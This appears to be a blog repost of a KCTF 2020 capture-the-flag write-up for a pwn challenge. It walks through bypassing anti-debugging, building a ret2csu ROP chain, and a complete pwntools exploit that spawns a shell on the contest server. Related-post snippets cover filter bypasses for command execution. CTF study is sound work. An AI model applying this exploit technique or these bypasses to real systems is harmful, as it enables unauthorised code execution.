ctf xor题_2020 KCTF秋季赛 | 第九题设计及解题思路

最新推荐文章于 2024-06-29 13:53:49 发布
最新推荐文章于 2024-06-29 13:53:49 发布
阅读量459 收藏
点赞数
文章标签: ctf xor题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34318945/article/details/112198271
版权
76de952b81624df920cf9ac56de8334b.png 2020 KCTF 秋季赛的第九题《命悬一线》,也是本次CTF的倒数第二道赛题,吸引了1000多人围观,最终有 10 支战队对本题发起攻击并获得成功。 第二支夺旗的战队  w0ooo  在本道题比赛中发挥异常亮眼,似乎错过前8道赛题,不过他们并没有放弃,依然以本题第二的成绩,冲进近300支战队中的第18名,恭喜! 547dcc7d3b024387a19a5d95b74c125d.png

此外 P&R、INVCODE 两支战队也在本题比赛中崭露头角!

接下来仅剩最后一道赛题,请大家全力以赴,不要放弃!加油! 711ef654721ea76c5180232924e48bf6.gif 一. 题目简介

本以为重置机器人三大法则,就可以逆转形势,但你们与Norns的较量才刚刚开始。

Norns强大的运算能力和速度果然名不虚传,你和肖恩两人合力对其发起进攻,也只是艰难地抓住一线机会,从Norn那里夺回短暂的主动权。

仿生人们还未恢复正常多久,在这场激烈的拉锯战中,攻防局势再度逆转,系统权限又被Norns收回。

仿生人大军压境,随着机械运转的声音,各个出入口也被紧紧关闭,你们所在的这一层被Norns彻底封锁。

你突然感到脊背一凉,转头更是撞上了无人机闪着红光的“眼睛”正对你们虎视眈眈。

潜入Norns老巢的你们此刻正如瓮中之鳖。就算侥幸逃脱仿生人的围剿,如果这些无人机同时对你们进行扫射,你们也会成为活靶子,无处可逃。

“面对困难最好的办法就是微笑着面对他,奥利给!!”肖恩突然一句不合时宜的话让你和希莉娅哭笑不得。

你们三人相视一笑,坐以待毙可不是你们的风格,是时候该打响反攻战的号角了!!

可眼下敌方人多势众,跟他们硬刚的确不是明智之举。你们三人决定先离开这个是非之地,再去找位于最高研究所顶楼的Norns本体。

现在调出大楼布局图,争分夺秒找到最快速的逃离路线,逃出生天吧! 

* 上下滑动查看 711ef654721ea76c5180232924e48bf6.gif 二. 出题团队简介 7b5a6ef2e5a4f8dfd2244d73b51f3911.png 711ef654721ea76c5180232924e48bf6.gif 三.设计思路 设计思路由 黄瓜香蕉 提供

一道栈溢出

d7d94e2dd7e20a2c2bb7ce5bdf7d9259.png 程序开启了canary和nx存在绕过canary。 发现了程序使用了类。 在类函数中可以存在虚表,可以通过修改虚表达到劫持程序流程。 6c1e81999557916af97a1c08956256ef.png 可以通过修改rax来劫持程序流程。 可以看到程序调用函数: 3a3865479da525afcf326a5387e97a57.png 使用了dlope 和dlsym 通过dlopen打开libc,然后使用dlsym动态获取获取函数地址,  字符串都已经异或加密了,恶心成分+1。 a4387dda8d80bd09f9f14f2bba913801.png 程序检测了/proc/%d/status 文件中的TracerPid来判断是否被调试。 ddc268fface628d28b6ae96d3adeca3b.png 程序增加了反调试,检测了ptrace,在docker中patch会返回-1,在正常环境是运行不了的,找到了patch,使用的是汇编syscall,当然静态是看不到的,在运行时候还原的,恶心成分+1, d2d4e4c174ae0aca430f09c7f45326a8.png 57dd99ffbad6ed380ca1ef6d2bc48c32.png patch 程序后使用gdb调试单步跟踪,可以看到在析构中有个输出是使用syscall调用 write输出的。 395f040d8b9159a4e162694f8e444181.png 构造rop获得shell。 711ef654721ea76c5180232924e48bf6.gif 四. 解题思路

解题思路由作者 number_Z 提供

一、序 命悬一线?PWN!

2c4a66855d0da77d35a6a0a775be6870.png

二、题目分析
1、看到题目后,先上checksec,可以发现题目为64位程序,未开PIE,说明代码段、数据段地址固定。
root@ubuntu:/mnt/hgfs/ShareDir/ctf/pwn1# checksec pwn1[*] '/mnt/hgfs/ShareDir/ctf/pwn1/pwn1'    Arch:     amd64-64-little    RELRO:    Partial RELRO    Stack:    Canary found    NX:       NX enabled    PIE:      No PIE (0x400000)
79f6fe180d82fc9b86ec5346263a4ae8.png
2、静态分析下程序,漏洞点很明显,读入0x200大小,而只memset 0x60的空间,存在栈溢出漏洞。
ff1026648113aded6dcbe1e84b388948.png a70d3561f8e75ac085878027fc965e3c.png
3、接下来动态调试下,可以发现一些反调试。
# (cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h) 查看系统调用号sub_400CA8()有ptrace反调试,patch处理掉。init_array中调用到sub_400E08()时,可以看到检查了sub_400E82()的结果,而sub_400E82()中原逻辑为返回TracerPid。如果检查不通过的话,系统调用sub_4017CC()方法将被更改...。解决方法有很多,我这边是在sub_400E82()中patch返回值为0,绕过检查。
afa8a364f73a2cbd2af9d150c91770ad.png c765182e7794ba66f70ce0393d48e493.png 三、利用
1、总结一下分析结果,64位,暂时没泄露出地址,存在栈溢出漏洞可输入0x200长度字符,NO-PIE的情况。敏感的同学已经感觉到通用gadget的召唤了吧,原理这里不再赘述,有需要的同学请移步:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium-rop-zh/#ret2csu

2、ROPgadget找一下:
# 0x000000000040185b最长最牛,我们去他附近找找。root@ubuntu:/mnt/hgfs/ShareDir/ctf/pwn1# ROPgadget --binary pwn1 --only "pop|ret"Gadgets information============================================================0x000000000040185c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret0x000000000040185e : pop r13 ; pop r14 ; pop r15 ; ret0x0000000000401860 : pop r14 ; pop r15 ; ret0x0000000000401862 : pop r15 ; ret0x000000000040185b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret0x000000000040185f : pop rbp ; pop r14 ; pop r15 ; ret0x0000000000400a20 : pop rbp ; ret0x0000000000400b60 : pop rbx ; pop rbp ; ret0x0000000000401863 : pop rdi ; ret0x0000000000401861 : pop rsi ; pop r15 ; ret0x000000000040185d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret0x000000000040028c : ret0x0000000000401757 : ret 0x1be0x0000000000400c32 : ret 0x458b0x0000000000400f07 : ret 0x858b0x0000000000400c55 : ret 0x8b480x0000000000400da5 : ret 0xbe
3、果然有货啊...,0x401840、0x40185A处发现通用gadget,记录下来便于后续利用。
cbd1d9cc4c837fb1622bd3e5b74cc4d8.png
4、栈溢出要解决的第一个问题是canary,那么如何解决呢?
经过测试,我们运行输入一段长度溢出的数据,动态调试断点执行到0x40169E,可以发现另一个利用点。 总结一下就是,程序会把栈上一个地址的值保存到rax寄存器中,通过一番简单的赋值操作可以call一个指针指向的地址。而保存在栈上这个值是我们可以溢出覆盖到的,那么就意味着我们可以通过控制该值来调用任意一个指针指向的地址。如果能找到一个合适的指针就好了,该指针指向的任意地址也可以由我们控制,那就简单了。 6d73b10b7498514115561a5df95f18eb.png
5、寻找梦想指针
仔细观察同学们可以发现,0x6020C0完全满足我们的要求,该指针地址保存了我们所有的输入,而这些输入的数据我们都可以控制。 f387eed2259022c9d2cb6b24eebca09d.png
6、配合上面通用gadget的方法,控制syscall(0x4017cc),构造一个execve("/bin/sh", NULL, NULL)。
# call execve 系统调用号为59 ,控制后两个参数为0root@ubuntu:/mnt/hgfs/ShareDir/ctf/pwn1# cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep execve#define __NR_execve 59
7、系统调用syscall(0x4017cc)处寄存器赋值小坑。
5681bd32c7b770c1f36abb6ce7d33acf.png 
# payload构造如下,常规的通用gadget利用方式不细说了,点上文传送阵学习,这里提一个点,需要一点小窍门绕过去def csu(rbx, rbp, r12, r13, r14, r15, last):    # pop rbx,rbp,r12,r13,r14,r15    # rbx should be 0,    # rbp should be 1,enable not to jump    # r12 should be the function we want to call    # rdi=edi=r15d    # rsi=r14    # rdx=r13    payload = ''    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)    payload += p64(csu_front_addr)    payload += '/bin/sh\x00' + 'A' * 0x28    payload += p64(last)    return payload # 就是execve需要三个参数,而我们此时只能控制两个参数(常规通用gadget方式只能控制rdi、rsi、rdx三个寄存器,无法控制rcx)# 调用号 rdi=edi=r15d=59 call execve# 第一个参数rsi = r14 = 0x602120 (保存了/bin/sh)  # 第二个参数rdx = r13 = 0# !!我们这里需要控制第三个参数 rcx = 0 才能满足execve("/bin/sh", NULL, NULL)的条件# 解决办法就是在内存中找到一个地址是# xor rcx, rcx; ret; 构造变形一下通用gadget的利用方式 在调用execve前 使rcx为0syscall = 0x4017CCpayload = p64(syscall) + p64(csu_end_addr) + 'A' * 8payload += p64(xor_rcx_ret_addr) + p64(csu_end_addr)payload += csu(0, 1, 0x6020C0, 0, 0x602120, 59, main_addr)payload += 'A' * 8payload += p64(0x6020C8 - 0x18)
四、完整EXP 
#coding:utf8#!python#!/usr/bin/env python from pwn import * context.terminal = ['gnome-terminal', '-x', 'sh', '-c']context.log_level = "debug" elfpath = '/mnt/hgfs/ShareDir/ctf/pwn1/pwn1'elf = ELF(elfpath)if len(sys.argv) == 0:    p = process(elfpath, env={'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc.so.6'}, timeout=2)else:    p = remote('121.36.145.157', 9999) csu_front_addr = 0x401840csu_end_addr = 0x40185Amain_addr = 0x400AB6xor_rcx_ret_addr = 0x4017E3 # xor rcx, rcx; ret; def csu(rbx, rbp, r12, r13, r14, r15, last):    # pop rbx,rbp,r12,r13,r14,r15    # rbx should be 0,    # rbp should be 1,enable not to jump    # r12 should be the function we want to call    # rdi=edi=r15d    # rsi=r14    # rdx=r13     payload = ''    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)    payload += p64(csu_front_addr)    payload += '/bin/sh\x00' + 'A' * 0x28    payload += p64(last)    return payload syscall = 0x4017CCpayload = p64(syscall) + p64(csu_end_addr) + 'A' * 8payload += p64(xor_rcx_ret_addr) + p64(csu_end_addr)payload += csu(0, 1, 0x6020C0, 0, 0x602120, 59, main_addr) # call __NR_execve 59 (cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep execve)payload += 'A' * 8payload += p64(0x6020C8 - 0x18) # getshellp.send(payload)p.interactive()
flag:{b5f4e9d4325d16d55783f7ea1b1ed956}
看完解析你会了吗?你还有不一样的解题思路吗? 实践出真知~速速动手自己做一遍,才算把知识装进脑子~ 欢迎大家分享解题思路哦~

5b9229eb9e37cca8dc003d478dc85a67.gif

现在第十题《终焉之战》正在火热进行中!

有你比赛更精彩!

越早提交答案,得分越高哦!

立即扫码加入战斗!

a21d92dc17e7be122e4faeb0acd661dc.png 华为全面屏智能电视、Xbox One X、JBL 无线蓝牙耳机等你来拿哦!

赛题回顾

aae47f3ba2cb231f379b231b893d2226.png

2020 KCTF秋季赛 | 第一题点评及解题思路

出题战队:七星战队

f41405d4d59845d378e931f29aaff46b.png

2020 KCTF秋季赛 | 第二题设计及解题思路

出题战队:中娅之戒

193a90fb120425b17c1098baea3f9c40.png

2020 KCTF秋季赛 | 第三题点评及解题思路

出题战队:2019

040a2e6083a1d3870c104340e3ff2d8a.png

2020 KCTF秋季赛 | 第四题点评及解题思路

出题战队:大灰狼爱喜羊羊

1be4648007d9cfab430d5133cfca5088.png

2020 KCTF秋季赛 | 第五题设计及解题思路

出题战队:金左手

9c0c5e0318c6c9a7f2ce78b68e017bc1.png

2020 KCTF秋季赛 | 第六题设计及解题思路

出题团队:T.O.

352c4e2a2e62b880617c49efe1100812.png

2020 KCTF秋季赛 | 第七题设计及解题思路

出题团队:HU1战队

e30ead0c3a59e05a45e1ff3372c11f6e.png

2020 KCTF秋季赛 | 第八题设计及解题思路

出题团队:BXS-iyzyi

755bf587b237d088a7dbd6d47e48d2b8.png ac784203ceb5a2b484d4790f49ba650f.gif

你的好友秀秀子拍了拍你

并请你点击阅读原文,参与最新一题的挑战!

当下的幸福
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf xor_一道使用异或来命令执行的CTF
weixin_28944067的博客
01-26 2379
0x01 命令执行命令执行是通过各种绕过方式来达到执行命令的方式拿到flag,在CTF中有很多常见绕过的方式,比如过滤了什么 cat | read | ls | dir | head | tail 等读文件的敏感命令,但是这些的话还是有方法绕过的,比如说 cat 可以更改为 tac 那么就会倒读进行读取了。0x02 审计代码我们可以审计一下下面的代码来进行剖析一个绕过的方式,首先该代码进行判断了正...
ctf xor_详解两道CTF逆向
weixin_34324618的博客
12-29 2004
0x01:confused_flxg这是Hackergame 2018的一道目拿到目,是一个压缩包,进行解压后发现是一个.exe可执行程序,双击可以正常运行随意输入,总是会出来一个倒序的base64编码后的字符串我们用python进行解码得到一个假的flag 不用管他Exeinfo PE载入可以发现是VC++写的64位程序,并且没有加壳我们直接使用IDA x64载入shift + F12可以...
Hack the Box CTF 简单难度 XOR 密码学目 Crypto 流程| Multikey Walkthrough
A Little Bean
12-30 1811
这是近期参加HTB夺旗战时遇到的一道难度为简单的密码学Crypto目。但是我觉得挺有意思,就做下记录。 这的核心思路就是他的加密算法 XOR。有两个核心的算法基础 ......
CTF目解析
最新发布
m0_74092749的博客
06-29 500
补全脚本如下:# 循环遍历 ASCII 表中可打印字符的可能值# 创建 md5 哈希对象# 构建特定格式的字符串,插入循环变量 i, j, k 对应的字符# 获取哈希值的十六进制表示# 检查哈希值是否包含特定的子串# 如果包含,则打印出来print(des)脚本的工作流程如下:1.使用三层嵌套循环遍历ASCII码表中的可打印字符(从空格(32)到波浪号(126))。
CTF目中XOR加密解法脚本
热门推荐
欢迎来到神林的博客
04-10 1万+
0x00:xor加密原理 简单异或密码(英语:simple XOR cipher)是密码学中一种简单的加密算法,它按照如下原则进行运算: A {\displaystyle \oplus } \oplus 0 = A A {\displaystyle \oplus } \oplus A = 0 (A {\displaystyle \oplus } \oplus B) {\displaysty...
CTF之流量审计设计
weixin_30340353的博客
03-28 570
出渗透也不是一次两次了,而是三次了。 上次给铁三出,贼麻烦。。。。抓包都是在路由器上抓包的,实体的wmware搭建的 通常的做法都是配置双网卡来实现跨vlan访问。 这次出因为离职了,用了vmware workstation pro出的。vmware只能实现lan区段或者是自定义网络,自定义网络就是192.168.0.0/24之类的,不用主机加入网络环境,只需要dhcp然后分配个子网掩...
hctf-2018-Crypto-xorgame
MangoFengC++
03-17 707
目 #这是一首英文诗,但它是加密的。找到标志,并恢复它 from Crypto.Util.strxor import strxor import base64 import random def enc(data, key): key = (key * (len(data) / len(key) + 1))[:len(data)] return strxor(data, key) poem = open('poem.txt', 'r').read() flag = "hctf{xx
CTF解题思路.xls
01-25
CTF解题思路
md5.zip_ctf的md5_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
"ctf的md5"和"md5 ctf"标签暗示了这是一个关于MD5的CTF挑战,可能涉及到以上提到的一种或多种解密技术。参者不仅需要了解MD5的基本原理,还可能需要掌握Python编程、密码学知识,甚至数学和逻辑推理能力,以解决...
智能网联汽车 天融信杯 信息安全攻防 2023 CTF
07-14
智能网联汽车 天融信杯 信息安全攻防 2023 CTF
BUUCTF----Xor(天璇战队提供目)
qq_64558075的博客
12-08 525
1.还是一样,拿到文件,习惯查壳 收集信息,无壳,32位程序 2.拖入ida中 F5转伪代码的时候,显示出错,翻译一下英文 发现不能正常反编译 百度一下原因,可能有两个 1、IDA无法识别出正确的调用约定。 2、IDA无法识别出正确的参数个数。 观察call调用的函数 发现就只需调用一个参数,所以是参数问,去掉后面的一个参数就可以了 鼠标选中该函数,然后按y键,去掉后面的那个参数(可能显示不一样,我第一次做的时候显示是..., 但是现在写的时候右显示char),然后点O.
ctf xor1
qq_20242529的博客
04-04 235
代码含义,将我们输入的密码的前一项与当前项异或再将结果如global对比,下一步查看global的值。一开始以为这里就是他的值,后面想想不对,一般值前有db。双击aFKW这段字符串。让后shift+e提取内容。
南邮 ctf xor
太菜了
02-25 1303
CG-CTF —RE xor 用IDA打开先看main函数,发现是几个fun和一个check,然后函数列表也就这几个自定义函数 先检查了check(), 发现return的success是正确的提示,看前面的是将input和v2比较,v2是copy的unk_100000ED0,打开这个数组会发现是 会发现隔四位有个十六进制的数,为啥分成4位,我也不清也是楚。,,,还是太菜 然后本来这道就叫...
攻防世界 Crypto高手进阶区 6分 xor_game
闵行小鱼塘
01-20 1512
继续ctf的旅程,攻防世界Crypto高手进阶区的6分,本篇是xor_game的writeup
BBUCTF XOR
qq_73667990的博客
10-24 1176
BBUCTF XOR
[MRCTF2020]Xor
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-17 497
[MRCTF2020]Xor
ctf xor_CTF下的命令执行
weixin_39877898的博客
12-29 2568
前言:做web也经常遇到很多关于命令执行的一些姿势,这次就总结下来。0x00:一些绕过姿势在遇到的一些web中,会经常将以下几种给过滤或者进行限制:空格命令分隔符关键字限制长度限制回显等等,这次就通过目将这些如何绕过的知识给记录下来。空格绕过常见的绕过符号有:$IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、#$IFS在linux下表示分隔符,如果...
ctf逆向xor与hello world以及解析pe文件头
2302_80106308的博客
01-29 1151
SizeOfOptionalHeader(2个字节):可选PE头的大小,32位PE文件默认E0,64位默认F0。SizeOfImage(4个字节):文件在内存中的大小,按SectionAlignment对齐后的大小。SizeOfCode(4个字节):所有代码的总大小 按照FileAlignment对齐后的大小。SizeOfHeaders(4个字节):DOS头+NT头+标准PE头+可选PE头+区段头(ImageBase(4个字节):内存镜像地址(程序被加载到内存后的起始地址(绝对地址))
CTF中基本的Xor解密操作
豆傻小饼干随记
10-24 8594
直接贴脚本咯,没优化,只是单纯实现了功能。 工作方式就是直接把值输入进去,开始进行base64解密,如果不能解密就退出,如果可以解密就执行xor的检测,如果值一样就按照值一样的方式进行xor操作,然后输出flag,如果xor值是递增的话,就按照递增的操作,然后输出flag #!/usr/bin/env python #-*- coding:utf-8 -*- import sys impor...
"63w字网络安全选择库:CTF汇总整理
本网络安全选择库共计63万字,内容涵盖了大量关于网络安全知识,专门针对ctf中的选择进行了整理和汇总。其中包括了一系列问,如第38中若漏洞威胁描述为“低影响度,中等严重度”,则该漏洞威胁等级为A...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值